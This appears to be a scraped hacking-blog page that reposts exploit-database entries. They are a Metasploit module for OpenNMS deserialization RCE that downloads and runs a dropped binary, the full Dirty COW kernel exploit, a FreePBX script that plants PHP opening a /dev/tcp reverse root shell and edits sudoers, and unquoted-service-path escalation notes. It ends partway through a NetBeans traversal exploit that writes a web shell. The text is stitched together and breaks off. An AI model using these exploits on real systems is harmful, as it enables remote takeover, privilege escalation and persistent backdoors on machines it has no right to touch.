##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Java::Rmi::Client
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenNMS Java Object Unserialization Remote Code Execution',
'Description' => %q(
This module exploits a vulnerability in the OpenNMS Java object which allows
an unauthenticated attacker to run arbitary code against the system.
),
'Author' =>
[
'Ben Turner <benpturner[at]yahoo.com>', # @benpturner
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/' ]
],
'Targets' =>
[
[ 'OpenNMS / Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
[ 'OpenNMS / Linux x86_64', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2014'
)
)
register_options(
[
Opt::RPORT(1099),
OptString.new('WRITABLEDIR', [false, 'A writable directory on the host', '/tmp/'])
], self.class)
end
# This is the execute function that is re-used throughout
def exec_command(cmd)
vprint_status("#{peer} - Downloading the file #{cmd}")
# Do the exploit command bit
data1 = "\x4a\x52\x4d\x49\x00\x02\x4b"
data2 = "\x00\x09\x31\x32\x37\x2E\x30\x2E\x31\x2E\x31\x00\x00\x00\x00\x50\xAC\xED\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4D\xC9\xD4\xE6\x3B\xDF\x74\x00\x05\x70\x77\x6E\x65\x64\x73\x7D\x00\x00\x00\x01\x00\x0F\x6A\x61\x76\x61\x2E\x72\x6D\x69\x2E\x52\x65\x6D\x6F\x74\x65\x70\x78\x72\x00\x17\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\xDA\x20\xCC\x10\x43\xCB\x02\x00\x01\x4C\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x72\x65\x66\x6C\x65\x63\x74\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\x02\x4C\x00\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x70\x78\x70\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x70\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7E\x00\x00\x73\x71\x00\x7E\x00\x05\x73\x7D\x00\x00\x00\x01\x00\x0D\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x4D\x61\x70\x70\x78\x71\x00\x7E\x00\x02\x73\x71\x00\x7E\x00\x05\x73\x72\x00\x2A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x70\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x70\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\x43\x6F\x6E\x73\x74\x61\x6E\x74\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x70\x78\x70\x76\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x70\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7E\x00\x24\x73\x71\x00\x7E\x00\x1C\x75\x71\x00\x7E\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7E\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7E\x00\x21\x73\x71\x00\x7E\x00\x1C\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74\x00"
data2 += cmd.length.chr
data2 += cmd
data2 += "\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x24\x00\x00\x00\x01\x71\x00\x7E\x00\x29\x73\x71\x00\x7E\x00\x17\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x70\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7E\x00\x09\x3F\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7E\x00\x3F\x78\x71\x00\x7E\x00\x3F"
begin
connect
sock.put(data1)
# Wait for a successful response
data = recv_protocol_ack # rescue nil
unless data
fail_with(Failure::Unknown, "This system has not responded with the correct RMI header")
end
# Send the RMI payload
sock.put(data2)
# Disconnect
disconnect
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the host")
end
end
# Wget the file onto the host in the temp directory
def wget_payload
resource_uri = '/' + @dropped_elf
if datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::"
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
vprint_status("#{peer} - Starting up our web service on #{service_url} ...")
start_service(
'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }
)
exec_command("wget -P #{datastore['WRITABLEDIR']} #{service_url}")
Rex.sleep(15)
end
# Change permissions to permit binary execution
def chmod_payload
cmd = "chmod +x #{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
vprint_status("#{peer} - Chmod the payload...")
res = exec_command(cmd)
fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload") unless res
Rex.sleep(1)
end
# Execute payload on host
def exec_payload
cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
vprint_status("#{peer} - Executing the payload...")
res = exec_command(cmd)
fail_with(Failure::Unknown, "#{peer} - Unable to exec payload") unless res
Rex.sleep(1)
end
# Handle incoming requests from the server
def on_request_uri(cli, _request)
vprint_status("#{peer} - Sending the payload to the server...")
send_response(cli, generate_payload_exe)
end
# Create the payload and run the commands in succcession
def exploit
print_status("#{peer} - Exploting the vulnerable service...")
@payload_url = ''
@dropped_elf = rand_text_alpha(rand(5) + 3)
wget_payload
chmod_payload
exec_payload
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863291410
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
void *map;
int f;
struct stat st;
char *name;
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3) {
(void)fprintf(stderr, "%s\n",
"usage: dirtyc0w target_file new_content");
return 1; }
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return 0;
}
# Exploit Title: SQL Injection in Just Dial Clone Script
# Date: 20 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: http://www.i-netsolution.com/
*----------------------------------------------------------------------------------------------------------------------*
# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/category-view-list.php?srch=PoC%27
*----------------------------------------------------------------------------------------------------------------------*
#!/usr/bin/env python
'''
Title | FreePBX 13 Remote Command Execution and Privilege Escalation
Date | 10/21/2016
Author | Christopher Davis
Vendor | https://www.freepbx.org/
Version | FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)
Tested on | http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso
http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso
Purpose | This script exploits the freepbx website, elevates privileges and returns a reverse bind tcp as root
Usage | python pbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444 -s r
Orig Author | pgt - nullsecurity.net
'''
import re
import subprocess
import argparse
import random
import time
import socket
import threading
#This portion will check for requests and prompt user to install it if not already
try:
import requests
except:
try:
while True:
choice = raw_input('Requests library not found but is needed. Install? \'Y\'es or \'N\'o?\n:')
if choice.lower() == 'y':
subprocess.call('pip install requests',shell=True)
import requests
break
elif choice.lower() == 'n':
exit()
else:
continue
except Exception as e:
print(e)
exit()
#Since subprocess.call will bind, we start this thread sepparate to execute after our netcat bind
def delayGet():
global args
try:
time.sleep(5)
requests.get(args.url+ '0x4148.php.call', verify=False)
except:
pass
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser()
parser.add_argument('-u', type=str, help='hostname and path. Ex- http://192.168.1.1/path/', dest='url')
parser.add_argument('-l', type=str, help='localhost ip to listen on', dest='lhost')
parser.add_argument('-p', type=str, help='port to listen on', dest='lport')
parser.add_argument('-s', type=str, help="'L'ocal or 'R'oot shell attempt", dest='shell')
parser.add_help
args = parser.parse_args()
#Make sure args were passed
if args.url == None or args.lhost == None or args.lport == None or not bool(re.search(r'^(?:[L|l]|[r|R])$', args.shell)):
parser.print_help()
print("\nUsage: python freepbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444")
exit()
#Make sure the http url is there
if bool(re.search('[hH][tT][tT][pP][sS]?\:\/\/', args.url)) == False:
print('There is something wrong with your url. It needs to have http:// or https://\n\n')
exit()
#make sure / is there, if not, put it there
if args.url[-1:] != '/':
args.url += '/'
#python -c 'import pty; pty.spawn("/bin/sh")'
#this is the php we will upload to get a reverse shell. System call to perform reverse bash shell. Nohup spawns a new process in case php dies
#if version 13, lets try to get root, otherwise
if args.shell.upper() == 'R':
cmdshell = '<?php fwrite(fopen("hackerWAShere.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHRpbWUNCiMgLSotIGNvZGluZzogdXRmLTggLSotIA0KY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXA0KCSdOT1BBU1NXRFw6QUxMIlw+XD5cL2V0Y1wvc3Vkb2Vycy9nXCcgL3Zhci9saWIvJyBcDQoJJ2FzdGVyaXNrL2Jpbi9mcmVlcGJ4X2VuZ2luZScNCnN1YnByb2Nlc3MuY2FsbChjbWQsIHNoZWxsPVRydWUpDQpzdWJwcm9jZXNzLmNhbGwoJ2VjaG8gYSA+IC92YXIvc3Bvb2wvYXN0ZXJpc2svc3lzYWRtaW4vYW1wb3J0YWxfcmVzdGFydCcsIHNoZWxsPVRydWUpDQp0aW1lLnNsZWVwKDIwKQ==")); system("python hackerWAShere.py; nohup sudo bash -i >& /dev/tcp/'+args.lhost+'/'+args.lport+' 0>&1 ");?>'
else:
cmdshell = "<?php system('nohup bash -i >& /dev/tcp/"+args.lhost+"/"+args.lport+" 0>&1 ');?>"
#creates a session
session = requests.Session()
print('\nStarting Session')
session.get(args.url, verify=False)
print('\nScraping the site for a cookie')
HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0", "Accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language":"en-US,en;q=0.5","Referer": args.url + 'admin/ajax.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'}
print('\nPosting evil php')
postData = {'module':'hotelwakeup','command':'savecall','day':'now','time':'+1 week','destination':"/../../../../../../var/www/html/0x4148.php","language":cmdshell}
result = session.post(args.url + 'admin/ajax.php', headers=HEADERS, data=postData, verify=False)
if 'Whoops' not in result.text:
print(result.text)
print('\nSomething Went wrong. Was expecting a Whoops but none found.')
exit()
#calls the get thread which will execute 5 seconds after the netcat bind
print('\nStarting new thread for getting evil php')
z = threading.Thread(target=delayGet)
z.daemon = True
z.start()
print('\nBinding to socket '+ args.lport + ' Please wait... May take 30 secs to get call back.\n')
#This binds our terminal with netcat and waits for the call back
try:
subprocess.call('nc -nvlp '+args.lport, shell=True)
except Exception as e:
print(e)
print('\nIf you saw the message "sudo: no tty present and no askpass program specified", please try again and it may work.')
except Exception as e:
print(e)
print('\nSee above error')
# Exploit Title: Intel(R) PROSet/Wireless WiFi Software - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 15.01.1000.0927
# Tested on: Windows 7 Professional
The Intel(R) PROSet/Wireless WiFi Software installs 2 services with unquoted service paths.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
Rebooting the system or restarting either service will run the malicious executable with elevated privileges.
This was tested on version 15.01.1000.0927, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc EvtEng
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EvtEng
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Intel\WiFi\bin\EvtEng.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intel(R) PROSet/Wireless Event Log
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc RegSrvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RegSrvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intel(R) PROSet/Wireless Registry Service
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: PDF Complete Corporate Edition - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Software Link: http://www.pdfcomplete.com/cms/Downloads.aspx
# Version: 4.1.12
# Tested on: Windows 7 Professional
PDF Complete Corporate Edition installs a service with an unquoted service path.
This enables a local privilege escalation vulnerability. To exploit this vulnerability,
a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable
with elevated privileges.
This was tested on version 4.1.12, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc pdfcDispatcher
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: pdfcDispatcher
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\PDF Complete\pdfsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PDF Document Manager
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Lenovo ThinkVantage Communications Utility - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 3.0.42.0
# Tested on: Windows 7 Professional
The Lenovo ThinkVantage Communications Utility installs 2 services with unquoted
service paths. This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path
of either service. Rebooting the system or restarting either service will run the malicious
executable with elevated privileges.
This was tested on version 3.0.42.0, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc LENOVO.CAMMUTE
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LENOVO.CAMMUTE
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Lenovo\Communications Utility\CAMMUTE.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Lenovo Camera Mute
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc LENOVO.TPKNRSVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LENOVO.TPKNRSVC
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Lenovo Keyboard Noise Reduction
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
############################################################
From Lenovo PSIRT:
This issue was fixed in version 3.0.44.0, which was released on June 4, 2013. README for Lenovo Communications Utility program:
https://download.lenovo.com/pccbbs/mobiles/grcu19ww.txt
3.0.44.0 01 2013/06/04
<3.0.44.0>
- (Fix) Fixed the vulnerability issue of service program registration.
- (Fix) Fixed the issue that vcamsvc.exe might crash.
- (Fix) Fixed the issue that TpKnrres.exe might crash.
- (Fix) Fixed the issue that TPKNRSVC.exe might crash.
# Exploit Title: Realtek High Definition Audio Driver - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 6.0.1.6730
# Tested on: Windows 7 Professional
The Realtek High Definition Audio Driver installs a service with an unquoted service path.
This enables a local privilege escalation vulnerability. To exploit this vulnerability,
a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable
with elevated privileges.
This was tested on version 6.0.1.6730, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc RtkAudioService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RtkAudioService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
LOAD_ORDER_GROUP : PlugPlay
TAG : 0
DISPLAY_NAME : Realtek Audio Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.oracle.com
Product:
=================
Netbeans IDE v8.1
Vulnerability Type:
=========================
Import Directory Traversal
CVE Reference:
==============
CVE-2016-5537
Vulnerability Details:
=====================
This was part of Oracle Critical Patch Update for October 2016.
Vulnerability in the NetBeans component of Oracle Fusion Middleware (subcomponent: Project Import).
The supported version that is affected is 8.1. Easily exploitable vulnerability allows high privileged attacker with logon
to the infrastructure where NetBeans executes to compromise NetBeans. While the vulnerability is in NetBeans, attacks may significantly
impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some
of NetBeans accessible data as well as unauthorized read access to a subset of NetBeans accessible data and unauthorized ability to cause
a partial denial of service (partial DOS) of NetBeans.
Vulnerability in way Netbeans processes ".zip" archives to be imported as project. If a user imports a malicious project
containing "../" characters the import will fail, yet still process the "../". we can then place malicious scripts outside of
the target directory and inside web root if user is running a local server etc...
It may be possible to then execute remote commands on the affected system by later visiting the URL and access our script if that
web server is public facing, if it is not then it may still be subject to abuse internally by internal malicious users. Moreover,
it is also possible to overwrite files on the system hosting vulnerable versions of NetBeans IDE.
References:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW
Exploit Code(s):
=================
<?php
#archive path traversal
#target xampp htdocs as POC
#by hyp3rlinx
#===============================
if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default? Y/[file]>";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='<?php exec($_GET["cmd"]); ?>';
if(!empty($argv[2])&&is_numeric($argv[2])){
$depth=$argv[2];
}else{
echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
exit();
}
